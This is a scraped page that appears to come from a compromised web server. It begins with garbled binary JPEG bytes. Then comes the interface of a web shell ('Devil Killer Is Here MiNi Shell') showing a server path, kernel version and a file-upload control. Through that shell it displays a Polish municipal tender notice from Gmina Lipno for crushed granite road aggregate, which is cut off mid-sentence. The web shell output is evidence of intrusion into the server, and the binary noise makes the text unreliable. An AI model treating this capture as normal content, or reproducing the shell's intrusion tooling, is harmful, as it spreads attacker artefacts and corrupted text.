JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220323/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220323/0009486101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa kruszywa łamanego 0/31,5 mm granitowego przeznaczonego do wykonania podbudowy dróg </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Lipno</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 411050764</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Powstańców Wielkopolskich 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lipno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-111</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL417 - Leszczyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@lipno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.lipno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa kruszywa łamanego 0/31,5 mm granitowego przeznaczonego do wykonania podbudowy dróg </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-15185f23-a6b6-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00094861</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00026612/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa kruszywa łamanego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lipno/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami odbywa się za pośrednictwem platformazakupowa.pl pod adresem:<br/>https://platformazakupowa.pl/pn/lipno/proceedings</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym za pośrednictwem platformazakupowa.pl pod adresem:<br/>https://platformazakupowa.pl/pn/lipno/proceedings.<br/>Komunikacja między zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski,<br/>zawiadomienia oraz informacje, przekazywane są za pośrednictwem platformazakupowa.pl pod<br/>adresem: https://platformazakupowa.pl/pn/lipno/proceedings i formularza „Wyślij wiadomość do<br/>zamawiającego”. Zamawiający będzie przekazywał wykonawcom informacje za pośrednictwem<br/>platformazakupowa.pl.<br/>pod adresem: https://platformazakupowa.pl/pn/lipno/proceedings. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/lipno/proceedings. do<br/>konkretnego wykonawcy. Szczegółowe wymagania techniczne i organizacyjne dot. korespondencji<br/>elektronicznej zostały ujęte w<br/>rozdziale IX i X Specyfikacji Warunków Zamówienia. Z uwagi na limit znaków w ogłoszeniu<br/>Zamawiający w niniejszym punkcie nie jest w stanie opisać wszystkich wymagań.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016<br/>r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1) Administratorem Pani/Pana danych osobowych jest Urząd Gminy Lipno ul. Powstańców<br/>Wielkopolskich 9, 64-111 Lipno, reprezentowany przez Wójta Gminy Lipno.<br/>2) Administrator Danych wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować pod<br/>adresem e-mail: iod@lipno.pl lub pisemnie na adres siedziby Administratora Danych.<br/>3) Pani/Pana dane osobowe przetwarzane będą w celu niezbędnym do wypełnienie obowiązku<br/>pranego ciążącego na Administratorze Danych na podstawie ustawy z dnia 11 września 2019r. Prawo<br/>zamówień publicznych w związku z art. 6 ust. 1 lit. c RODO<br/>4) Pani/Pana dane osobowe mogą być przekazywane innym odbiorcom na podstawie przepisów prawa<br/>lub zawartych umów i nie będą przekazywane do państwa trzeciego lub organizacji międzynarodowej.<br/>5) Pani/Pana dane osobowe będą przechowywane przez okres niezbędny do realizacji celu, w którym<br/>zostały zebrane, a po tym czasie przez okres oraz w zakresie wymaganym przez przepisy prawa.<br/>6) Posiada Pani/Pan prawo dostępu do treści swoich danych, ich sprostowania, ograniczenia<br/>przetwarzania oraz wniesienia skargi do organu nadzorczego, którym jest Prezes Urzędu Ochrony<br/>Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych narusza przepisy<br/>RODO.<br/>7) Podanie przez Panią/Pana danych osobowych jest wymogiem ustawowym, niezbędnym do udziału<br/>w postępowaniu o udzielenie zamówienia publicznego.<br/>8) Pani/Pana dane osobowe nie będą przetwarzane w sposób zautomatyzowany i nie będą<br/>profilowane.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:<br/>-w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>-prawo do przenoszenia danych osobowych, o którym mowa a art 20 RODO<br/>-na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/pana danych osobowych jest art. 6 ust. 1 lit c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.4.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiot zamówienia pn.: „Dostawa kruszywa łamanego 0/31,5 granitowego przeznaczonego do wykonania podbudowy dróg” obejmuje dostawę kruszywa frakcji 0/31,5 mm wraz z transportem i rozładunkiem w miejscu wskazanym przez Zamawiającego w ilości 3500 Mg, które objęte są zamówieniem podstawowym oraz do 1000 Mg stanowiącym prawo opcji. <br/>Dostawa zamówienia podstawowego do dwóch lokalizacji po dwie tury:<br/>Tura nr I - do 1 miesiąca od dnia podpisania umowy:<br/>•	OD Nowe Mórkowo, Gmina Lipno – ilość: 750 Mg<br/>•	Wilkowice, Gmina Lipno – ilość:1250 Mg<br/>Tura nr II - do 3 miesięcy od dnia podpisania umowy:<br/>•	OD Nowe Mórkowo, Gmina Lipno – ilość: 500 Mg<br/>•	Wilkowice, Gmina Lipno – ilość: 1000 Mg<br/>Dostawa zamówienia objętego prawem opcji do jednej z dwóch albo do dwóch poniższych lokalizacji:<br/>Tura nr III stanowiąca prawo opcji: do 6 miesięcy od dnia podpisania umowy:<br/>•	OD Nowe Mórkowo, Gmina Lipno – ilość: do 500 Mg<br/>•	Wilkowice, Gmina Lipno – ilość: do 500 Mg<br/>2.	Szczegółowy opis przedmiotu zamówienia stanowi SST 04.04.02 [załącznik nr 3 do siwz]. Dostarczone kruszywo musi spełniać wymagania zawarte w załączonej SST 04.04.02. Wykonawca zobowiązany jest do przedstawienia Zamawiającemu, przed przystąpieniem do rozładunku dokumentów, o których mowa w SST 04.04.02 (lub równoważnych) potwierdzających spełnianie wymagań zawartych w SST. Jeżeli Wykonawca powołuje się na rozwiązania równoważne jest obowiązany wykazać, że oferowane przez niego kruszywo spełnia wymagania zawarte w SST 04.04.02. Nie przedstawienie ww. dokumentów może spowodować odmowę odbioru kruszywa.<br/>3.	Rozładunek i odbiór kruszywa odbędzie się w godzinach pracy Urzędu Gminy Lipno, w terminie uzgodnionym z Zamawiającym. Tylko za zgodą Zamawiającego przedmiot umowy może zostać dostarczony w kilku odrębnych dostawach. Wykonawca ponosi ryzyko oraz wszelkie koszty transportu i rozładunku kruszywa, jak również koszty ubezpieczenia przedmiotu zamówienia.<br/>4.	Rozładunek kruszywa nie może odbyć się bez dokonania jego odbioru przez pracownika Zamawiającego.<br/>5.	Wykonawca zobowiązany jest do przedstawienia dokumentu z ważenia kruszywa [każdego samochodu] przed jego rozładunkiem. Nie przedstawienie dokumentu z ważenia może spowodować odmowę odbioru kruszywa. <br/>6.	Ponadto Zamawiający zastrzega sobie możliwość wykonania weryfikacji tonażu dostarczanego kruszywa, co oznacza że każda dostawa przed rozładunkiem może zostać skierowana na wagę Gminnej Spółdzielni Samopomoc Chłopska w Lipnie. Weryfikacja tonażu kruszywa odbywa się na koszt Wykonawcy.<br/>7.	Prawo opcji: <br/>a)	Zamawiający zastrzega możliwość zastosowania prawa opcji do zwiększenia zakresu zamówienia o dostawę kruszywa w ilości do 1000 Mg;<br/>b)	Zamawiający może z prawa opcji nie skorzystać, lub skorzystać w części; <br/>c)	zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem Zamawiającego. Nie skorzystanie przez Zamawiającego z prawa opcji nie rodzi po stronie Wykonawcy żadnych roszczeń w stosunku do Zamawiającego;<br/>d)	zamówienie objęte opcją Wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu zawiadomienia od Zamawiającego, że zamierza z prawa opcji skorzystać; <br/>e)	Zamawiający jest uprawniony do skorzystania z prawa opcji tzn. zawiadomienia wykonawcy o skorzystaniu z tego prawa, w okresie do 5 miesięcy, licząc od dnia zawarcia umowy; <br/>f)	termin wykonania zamówienia objętego opcją wyznaczony przez Zamawiającego nie może być dłuższy niż 30 dni od dnia otrzymania przez Wykonawcę zawiadomienia o skorzystaniu przez Zamawiającego z prawa opcji dla zamówienia objętego opcją; <br/>g)	zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak te, które obowiązują przy realizacji zamówienia podstawowego; <br/>h)	Zamawiający zastrzega, że ceny jednostkowe objęte opcją będą identyczne, jak w zamówieniu podstawowym; <br/>i)	Zamawiający zastrzega, że zamówienie w ramach prawa opcji jest wielkością maksymalną, a ilości te mogą ulec zmianie (zmniejszeniu);<br/>j)	szczegóły związane z prawem opcji zawarte są w Istotnych postanowieniach umowy stanowiących Załącznik nr 4 do SWZ.<br/>8.	Wspólny Słownik Zamówień CPC:<br/>14212200-2 kruszywo<br/>9.	Zakres zamówienia oraz szczegółowe właściwości i wymagania w stosunku do przedmiotu zamówienia zawarte są w SWZ i załącznikach do SWZ, UWAGA: Jeżeli Opis Przedmiotu Zamówienia wskazywałby w odniesieniu do materiałów znaki towarowe, patenty lub pochodzenie, to zgodnie z ustawą Prawo zamówień publicznych Zamawiający dopuszcza zaoferowanie materiałów równoważnych. Materiały pochodzące od konkretnego producenta określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą odpowiadać materiały proponowane przez Wykonawcę, aby zostały spełnione wymagania stawiane przez Zamawiającego i stanowią jedynie wzorzec, przykład jakościowy przedmiotu zamówienia, a to oznacza, że Zamawiający dopuszcza produkty o parametrach jakościowych i cechach użytkowych (równoważnych), tj. nie gorszych niż parametry wskazanego produktu, (materiału) i uzna każdy produkt o wskazanych lub lepszych parametrach. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">14212200-2 - Kruszywo</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Przedmiot zamówienia pn.: „Dostawa kruszywa łamanego 0/31,5 granitowego<br/>przeznaczonego do wykonania podbudowy dróg” obejmuje dostawę kruszywa frakcji 0/31,5 mm<br/>wraz z transportem i rozładunkiem w miejscu wskazanym przez Zamawiającego w ilości 3500<br/>Mg, które objęte są zamówieniem podstawowym oraz do 1000 Mg stanowiącym prawo opcji.<br/>Dostawa zamówienia objętego prawem opcji do jednej z dwóch albo do dwóch poniższych<br/>lokalizacji:<br/>Tura nr III stanowiąca prawo opcji: do 6 miesięcy od dnia podpisania umowy:<br/>• OD Nowe Mórkowo, Gmina Lipno – ilość: do 500 Mg<br/>• Wilkowice, Gmina Lipno – ilość: do 500 Mg<br/>7. Prawo opcji:<br/>a) Zamawiający zastrzega możliwość zastosowania prawa opcji do zwiększenia zakresu<br/>zamówienia o dostawę kruszywa w ilości do 1000 Mg;<br/>b) Zamawiający może z prawa opcji nie skorzystać, lub skorzystać w części;<br/>c) zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem Zamawiającego.<br/>Nie skorzystanie przez Zamawiającego z prawa opcji nie rodzi po stronie Wykonawcy żadnych<br/>roszczeń w stosunku do Zamawiającego;<br/>d) zamówienie objęte opcją Wykonawca będzie zobowiązany wykonać po uprzednim<br/>otrzymaniu zawiadomienia od Zamawiającego, że zamierza z prawa opcji skorzystać;<br/>e) Zamawiający jest uprawniony do skorzystania z prawa opcji tzn. zawiadomienia wykonawcy o<br/>skorzystaniu z tego prawa, w okresie do 5 miesięcy, licząc od dnia zawarcia umowy;<br/>f) termin wykonania zamówienia objętego opcją wyznaczony przez Zamawiającego nie może<br/>być dłuższy niż 30 dni od dnia otrzymania przez Wykonawcę zawiadomienia o skorzystaniu<br/>Ogłoszenie nr 2022/BZP 00050111/01 z dnia 2022-02-08<br/>2022-02-08 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>przez Zamawiającego z prawa opcji dla zamówienia objętego opcją;<br/>g) zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak te, które<br/>obowiązują przy realizacji zamówienia podstawowego;<br/>h) Zamawiający zastrzega, że ceny jednostkowe objęte opcją będą identyczne, jak w<br/>zamówieniu podstawowym;<br/>i) Zamawiający zastrzega, że zamówienie w ramach prawa opcji jest wielkością maksymalną, a<br/>ilości te mogą ulec zmianie (zmniejszeniu);<br/>j) szczegóły związane z prawem opcji zawarte są w Istotnych postanowieniach umowy<br/>stanowiących Załącznik nr 4 do SWZ. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający udzieli zamówienia Wykonawcy, którego oferta będzie<br/>odpowiadać wymaganiom zawartym w ustawie Prawo zamówień publicznych, SWZ i uzyska najwyższą<br/>liczbę punktów wyliczoną w oparciu o kryteria określone w rozdziale XVI SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności rachunku/faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.Ofertę składa się na Formularzu Ofertowym zgodnie z Załącznikiem nr 1 do SWZ.<br/>2.Do oferty należy załączyć odpowiednie oświadczenia/dokumenty, o których mowa w Rozdziale<br/>VIII SWZ.<br/>3.Oferta powinna być podpisana przez osobę upoważnioną do reprezentowania Wykonawcy<br/>(Wykonawców wspólnie ubiegających się o udzielenie zamówienia) Jeżeli upoważnienie nie<br/>wynika z ogólnie dostępnych danych rejestrowych (wpis KRS, CEIDG) do oferty należy załączyć<br/>dokument potwierdzający umocowanie danej osoby/osób do podpisania oferty.<br/>4.W przypadku gdy Wykonawcę/-ów reprezentuje pełnomocnik, należy do oferty załączyć<br/>pełnomocnictwo do reprezentowania Wykonawcy/-ów określające jego zakres i podpisane przez<br/>osoby upoważnione do reprezentowania Wykonawcy/-ów. Pełnomocnictwo składa się w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym. Dopuszcza się także złożenie cyfrowego odwzorowania pełnomocnictwa<br/>(sporządzonego uprzednio w postaci papierowej) opatrzonego kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność<br/>cyfrowego odwzorowania z dokumentem w postaci papierowej. Poświadczenia zgodności<br/>cyfrowego odwzorowania z pełnomocnictwem w postaci papierowej dokonuje mocodawca lub<br/>notariusz (w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2<br/>ustawy z dnia 14 lutego 1991 r. - Prawo o notariacie, które to poświadczenie notariusz opatruje<br/>kwalifikowanym podpisem elektronicznym). Cyfrowe odwzorowanie pełnomocnictwa nie może<br/>być poświadczone przez upełnomocnionego. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający żąda od Wykonawców wniesienia wadium w wysokości : <br/>1 000,00 zł (jeden tysiąc złotych 00/100) <br/>2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą.<br/>3.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>a.	pieniądzu,<br/>b.	gwarancjach bankowych,<br/>c.	gwarancjach ubezpieczeniowych<br/>d.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego nr 42 9043 1083 2832 0045 9169 0006<br/>z adnotacją: <br/>„Wadium w postępowaniu prowadzonym w trybie 